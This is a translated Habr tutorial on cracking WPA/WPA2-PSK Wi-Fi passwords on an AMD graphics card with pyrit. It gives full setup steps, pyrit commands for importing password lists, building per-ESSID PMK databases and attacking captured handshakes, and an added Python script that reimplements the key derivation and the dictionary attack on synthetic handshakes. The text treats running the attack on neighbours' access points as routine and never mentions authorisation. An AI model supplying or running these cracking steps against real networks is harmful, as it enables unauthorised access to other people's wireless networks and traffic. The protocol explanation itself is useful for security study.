WPA/WPA2 Password Cracking Using a Video Card

Hello, Habr!
Today I will show you how to put the full power of your video card to work on Wi-Fi password guessing. Using only the CPU for this (in particular, with aircrack-ng) is hardly comme il faut nowadays, when 80% of computers have a video card, so it makes sense to use all the power your system has. Specifically, we will talk about the wonderful program pyrit.

A little about the program:
Pyrit allows you to create massive databases of precomputed WPA/WPA2-PSK authentication material (a space-time trade-off). By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.

WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by giving every participating party the same Pre-Shared Key. This master key is derived from a password that the user first configures, for example, on his laptop and on the access point. When the laptop connects to the access point, a fresh session key is derived from the master key (together with values exchanged during the connection) to encrypt and authenticate the subsequent traffic. The "saving" of using a single master key instead of per-user keys makes deploying WPA/WPA2 networks in homes and small offices easier, at the cost of making the protocol vulnerable to brute-force attacks against its key-negotiation phase: whoever records that phase can test password guesses offline, as fast as the hardware allows.

What is the gain? Compare the number of PMKs/s for aircrack-ng and for pyrit (the screenshots are not reproduced here; the benchmark output below and the figures in the conclusion, roughly 3,000 PMKs/s on the processor against roughly 85,000 PMKs/s on the video card, tell the same story).

Note that everything described here was done on Ubuntu 10.04 R2 x86_64 with an ATI R6950 Twin Frozr III graphics card.
(That is, everything applies to any Ubuntu-like system, in particular BackTrack 5, with minimal differences between 32- and 64-bit systems.)
Installation
List of required software:
1. AMD driver 11.6
2. AMD APP SDK 2.4
3. Pyrit: svn checkout http://pyrit.googlecode.com/svn/trunk pyrit_svn
4. Calpp++

1. Driver installation:

chmod +x ati-driver-installer-11-5-x86.x86_64.run
sudo ./ati-driver-installer-11-5-x86.x86_64.run
sudo reboot

2. Installing AMD APP SDK 2.4:

cp /home/user/Downloads/AMD-APP-SDK-v2.4-lnx64.tgz /home/user
cd /home/user
tar -xvzf AMD-APP-SDK-v2.4-lnx64.tgz
sudo gedit ~/.bashrc

At the bottom of this file, add the following lines:

export AMDAPPSDKROOT=/home/user/AMD-APP-SDK-v2.4-lnx64
export AMDAPPSDKSAMPLESROOT=/home/user/AMD-APP-SDK-v2.4-lnx64/samples
export LD_LIBRARY_PATH=$AMDAPPSDKROOT/lib/x86:$AMDAPPSDKROOT/lib/x86_64:$LD_LIBRARY_PATH


! Replace user with your own username.
Note that the above works for both 32- and 64-bit systems.

Log out and back in so that the new variables take effect.

3. Registering the ICD (icd-registration):

sudo tar xfz $AMDAPPSDKROOT/icd-registration.tgz -C /

(The archive contains etc/OpenCL/vendors/*.icd, so extracting it at / puts the files where the OpenCL loader looks for them; copying the etc directory by hand without -r, as some guides suggest, does not work.)

IMPORTANT! Some English-language guides describe installing both technologies through which pyrit can talk directly to an ATI card: OpenCL, which for this task is hopelessly outdated, and Calpp with the libboost libraries, which is what we will use.
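A pre-flight check for the paths configured above, added here as a script of my own rather than anything from the original article or the pyrit project. It verifies, before you run cmake for Calpp, that the SDK root, the CAL libraries and headers that the CMakeLists.txt edit in the next step has to find, the ICD registration, and LD_LIBRARY_PATH are all in place. The file names are the ones the FIND_LIBRARY/FIND_PATH entries resolve to (libaticalcl.so, libaticalrt.so, cal.h, calcl.h); /etc/OpenCL/vendors is where icd-registration.tgz unpacks its .icd files.

```shell
#!/bin/sh
# Added pre-flight check, not from the original article. Verifies that what the
# ~/.bashrc variables and the Calpp CMakeLists.txt edit refer to actually exists
# before you run cmake. File names are the ones the article's FIND_LIBRARY /
# FIND_PATH lines resolve to (libaticalcl.so, libaticalrt.so, cal.h, calcl.h);
# /etc/OpenCL/vendors is where icd-registration.tgz unpacks its .icd files.

# check_calpp_prereqs SDKROOT [ICD_DIR]
# Prints one line per check; returns the number of failed checks (0 = ready to build).
check_calpp_prereqs() {
    sdk=$1
    icd_dir=${2:-/etc/OpenCL/vendors}
    fails=0

    _chk() {  # _chk "description" test-operator operand
        if test "$2" "$3"; then
            echo "ok      $1"
        else
            echo "MISSING $1"
            fails=$((fails + 1))
        fi
    }

    _chk "SDK root directory        $sdk"                           -d "$sdk"
    _chk "CAL compiler library      $sdk/lib/x86_64/libaticalcl.so" -f "$sdk/lib/x86_64/libaticalcl.so"
    _chk "CAL runtime library       $sdk/lib/x86_64/libaticalrt.so" -f "$sdk/lib/x86_64/libaticalrt.so"
    _chk "CAL header                $sdk/include/CAL/cal.h"          -f "$sdk/include/CAL/cal.h"
    _chk "CAL header                $sdk/include/CAL/calcl.h"        -f "$sdk/include/CAL/calcl.h"
    _chk "OpenCL ICD registered in  $icd_dir" -n "$(ls "$icd_dir"/*.icd 2>/dev/null)"

    # The .bashrc export only helps if the shell you build in has actually loaded it.
    case ":${LD_LIBRARY_PATH:-}:" in
        *":$sdk/lib/x86_64:"*) echo "ok      LD_LIBRARY_PATH contains $sdk/lib/x86_64" ;;
        *) echo "MISSING $sdk/lib/x86_64 not in LD_LIBRARY_PATH (logged out and back in?)"
           fails=$((fails + 1)) ;;
    esac
    return "$fails"
}

# Run directly:  sh check_calpp.sh --check    (uses AMDAPPSDKROOT from ~/.bashrc)
if [ "${1:-}" = "--check" ]; then
    check_calpp_prereqs "${AMDAPPSDKROOT:-}"
fi
```

Run it from a fresh login shell; if LD_LIBRARY_PATH is the only line reported as missing, the usual cause is that ~/.bashrc has not been re-read yet.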

4. Setting up Calpp:

sudo apt-get install libboost1.40-all-dev cmake
tar -xvzf calpp-0.90.tar.gz
cd calpp-0.90
sudo gedit CMakeLists.txt

In CMakeLists.txt, point the FIND_LIBRARY and FIND_PATH entries at the SDK (again, replace user with your username):

FIND_LIBRARY( LIB_ATICALCL aticalcl PATHS "/home/user/AMD-APP-SDK-v2.4-lnx64/lib/x86_64/" )
FIND_LIBRARY( LIB_ATICALRT aticalrt PATHS "/home/user/AMD-APP-SDK-v2.4-lnx64/lib/x86_64/" )
FIND_PATH( LIB_ATICAL_INCLUDE NAMES cal.h calcl.h PATHS "/home/user/AMD-APP-SDK-v2.4-lnx64/include/CAL" )

sudo cmake .
sudo make install

5. Installing pyrit:

sudo apt-get install g++ python-dev zlib1g-dev libssl-dev python-scapy libpcap0.8 libpcap0.8-dev libpcap-dev
svn checkout http://pyrit.googlecode.com/svn/trunk pyrit_svn
cd pyrit_svn/pyrit
sudo python setup.py build install
cd ../cpyrit_calpp
sudo python setup.py build install

This completes the installation. Check it with the built-in self-test:

pyrit selftest

Usage

1. Look at the available processor cores and video cards:

pyrit list_cores

2. Run the benchmark:

pyrit benchmark

Output (the number of PMKs/s will naturally depend on your video card):

#1: 'CAL++ Device #1 'ATI CYPRESS'': 82426.3 PMKs/s (RTT 2.4)
#2: 'CPU-Core (SSE2)': 643.5 PMKs/s (RTT 3.0)
#3: 'CPU-Core (SSE2)': 655.1 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 691.0 PMKs/s (RTT 2.9)
#5: 'Network-Clients': 0.0 PMKs/s (RTT 0.0)


Note that each graphics card takes the place of one processor core in this list (pyrit dedicates a CPU core to feeding each GPU), so with two or more cards, or a dual-GPU card, the output looks like this:

#1: 'CAL++ Device #1 'ATI CYPRESS'': 82426.3 PMKs/s (RTT 2.4)
#2: 'CAL++ Device #2 'ATI JUNIPER'': 41805.7 PMKs/s (RTT 2.6)
#3: 'CPU-Core (SSE2)': 655.1 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 691.0 PMKs/s (RTT 2.9)
#5: 'Network-Clients': 0.0 PMKs/s (RTT 0.0)

Everything below assumes that you already have a .cap file with a captured handshake (see how to capture a handshake).

IMPORTANT!
Pyrit lets you build whole databases of precomputed hashes for password guessing. There are two ways to store and use these databases:
Option 1 is storing the database in the hidden folder in the user's home directory (pyrit's default, under ~/.pyrit). I call it the mobile option: a file with 1 million frequently used passwords is loaded, and then any ESSID is added to it for a quick check (1 million words plus 1 ESSID takes about a minute on my card).
Pros:
The password file is loaded once and forgotten (you can load as many as you like, but this is NOT recommended)
Any number of ESSIDs with any names
Little time spent
Cons:
With dictionaries of more than 20 million words and 10 or more different ESSIDs, considerably more time is spent.
Conclusion: the pros flow smoothly into the cons and vice versa. For my part, I note that this is ideal if you have a strong dictionary of up to 1 million words, which lets you check different .cap files quickly.
Usage example:

pyrit -i /path/to/passwords.txt import_passwords
pyrit -r cap-01.cap analyze
pyrit -r cap-01.cap -b 00:11:22:33:44:55 attack_batch
or
pyrit -r cap-01.cap attack_batch

(analyze lists the access points and handshakes found in the capture; pass the BSSID of the one you want to attack with -b.)

Option 2 is storing the database in any folder the user specifies. This is a more thorough approach. It lets you build a database for specific ESSIDs and a specific set of passwords: a file with, say, 100 million passwords is loaded, and then any ESSIDs with unique names are added to it. After that the database is compiled, i.e. the PMKs are computed and stored for the specific ESSIDs you loaded into it. After compilation, the speed increases 5-7 times. You will say it is a great option, and you will be right, but of course there is a catch: the compilation time, which naturally depends on the number of passwords and ESSIDs, and it is long.
Pros:
One database for, say, 10 unique ESSIDs can be used against any access point whose name matches one in the database. That is, if two of your neighbours both have an access point named dlink, with different MAC addresses of course, this does NOT stop you from running both against the database without building a new one.
Speed
Huge speed
Build one database for the most common ESSIDs and check them in minimal time, in any quantity.
Cons:
Compilation time
Takes up a lot of hard disk space.
Conclusion: the dry facts about my database: 850 million words, 24 ESSIDs, 32 hours of compilation, 650,000 PMKs/s when running through the database, 240 GB in size.
Naturally, with fewer passwords and ESSIDs the time cost drops in direct proportion. Whether it is worth it or not, everyone decides for himself.
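The key derivation described at the start of the article (master key from the password and the network name, session key from the master key at connection time, then the handshake check) and the reason Option 2's database is tied to ESSIDs rather than to access points, as an added example in plain Python. This is my own illustration, not pyrit's code: the handshakes, MAC addresses, nonces and word list are constructed inside the script, and the only external value is the PMK test vector (passphrase "password", ESSID "IEEE") from IEEE 802.11i Annex H.

```python
# Added example (not pyrit's code): the WPA2-PSK derivation chain from the article
# (passphrase -> PMK -> PTK -> EAPOL MIC) in plain Python, plus a pyrit-style "batch"
# table of precomputed PMKs keyed by ESSID. The handshakes below are constructed here
# from a known passphrase; nothing is captured from the air. ESSIDs, MAC addresses,
# nonces and the word list are made up for the demonstration.
import hashlib
import hmac
import struct
from dataclasses import dataclass

MIC_OFFSET = 81  # EAPOL header (4) + Key Descriptor fields preceding Key MIC (77)


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).

    The expensive step pyrit offloads to the GPU. It depends on the passphrase and
    the ESSID only, not on the BSSID: one PMK table serves every AP with that name.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))  # 4 x 20 bytes covers the 64 needed
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    WPA1/TKIP (version 1) uses HMAC-MD5 here instead."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


@dataclass
class Handshake:
    """What pyrit pulls out of a .cap: ESSID, both MACs, both nonces, EAPOL message 2."""
    essid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol: bytes  # EAPOL-Key message 2 (STA -> AP) as sent, MIC field filled in


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key frame: EAPOL v2, type Key, RSN descriptor, key info 0x010a,
    key length 0, replay counter 1, SNonce, zero IV/RSC/ID, MIC, empty key data."""
    body = (b"\x02" + struct.pack(">HHQ", 0x010A, 0, 1) + snonce
            + b"\x00" * 32 + mic + struct.pack(">H", 0))
    return b"\x02\x03" + struct.pack(">H", len(body)) + body


def make_handshake(essid, passphrase, ap_mac, sta_mac, anonce, snonce) -> Handshake:
    """Builds a synthetic but internally consistent handshake for the given passphrase."""
    ptk = derive_ptk(derive_pmk(passphrase, essid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(ptk[:16], build_eapol_msg2(snonce))
    return Handshake(essid, ap_mac, sta_mac, anonce, snonce, build_eapol_msg2(snonce, mic))


def pmk_matches(pmk: bytes, hs: Handshake) -> bool:
    """The cheap per-candidate check: PRF-512 plus one HMAC, no PBKDF2."""
    kck = derive_ptk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.eapol[MIC_OFFSET:MIC_OFFSET + 16])


def batch(passwords, essids) -> dict:
    """Like `pyrit batch`: compute the PMK for every (ESSID, passphrase) pair once."""
    return {e: {pw: derive_pmk(pw, e) for pw in passwords} for e in essids}


def attack_db(db: dict, hs: Handshake):
    """Like `pyrit attack_db`: walk the stored PMKs for the handshake's ESSID.
    Returns the passphrase, or None if the ESSID is not in the database or nothing fits."""
    for pw, pmk in db.get(hs.essid, {}).items():
        if pmk_matches(pmk, hs):
            return pw
    return None


if __name__ == "__main__":
    db = batch(["password", "12345678", "qwertyuiop", "letmein12"], ["linksys", "dlink"])
    sta = bytes.fromhex("66778899aabb")
    # Two neighbours both named "dlink" with different BSSIDs: one table cracks both.
    hs1 = make_handshake("dlink", "letmein12", bytes.fromhex("001122334455"), sta, b"\x01" * 32, b"\x02" * 32)
    hs2 = make_handshake("dlink", "qwertyuiop", bytes.fromhex("0a0b0c0d0e0f"), sta, b"\x03" * 32, b"\x04" * 32)
    print(attack_db(db, hs1), attack_db(db, hs2))  # letmein12 qwertyuiop
    # Same passphrase, but an ESSID the table was never built for: no hit (Option 2's catch).
    hs3 = make_handshake("netgear", "letmein12", bytes.fromhex("001122334455"), sta, b"\x01" * 32, b"\x02" * 32)
    print(attack_db(db, hs3))  # None
```

The split between batch() and attack_db() is the whole point of Option 2: the 4096-iteration PBKDF2 in derive_pmk is paid once per (ESSID, password) pair and stored, while each handshake only costs a PRF-512 and one HMAC per candidate, which is why the compiled database runs so much faster than attack_batch and why it is useless for an ESSID it was not built for.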
Usage example:

pyrit -u file:///path/to/database.db -i /path/to/passwords.txt import_passwords
pyrit -u file:///path/to/database.db -e linksys create_essid
pyrit -u file:///path/to/database.db eval
pyrit -u file:///path/to/database.db batch
pyrit -u file:///path/to/database.db eval
pyrit -u file:///path/to/database.db -r /path/to/output-01.cap attack_db

(eval reports, per ESSID, how many of the imported passwords already have a computed PMK: run before batch it shows the work ahead, run after it confirms the database is complete.)

Conclusion
For those who are constantly or professionally engaged in Wi-Fi password cracking, such programs make life much easier. Nowadays it is a sin not to use all the power of your hardware; it is not for nothing that we upgrade :) (A reminder of the difference: about 3,000 PMKs/s on the processor versus about 85,000 PMKs/s on the video card.) A few words about analogues: there is CommView for WiFi, a Windows program, which I have never seen or touched, since I do not use Windows. It is, of course, a paid product (around $500).

Related links:
pyrit
aircrack-ng
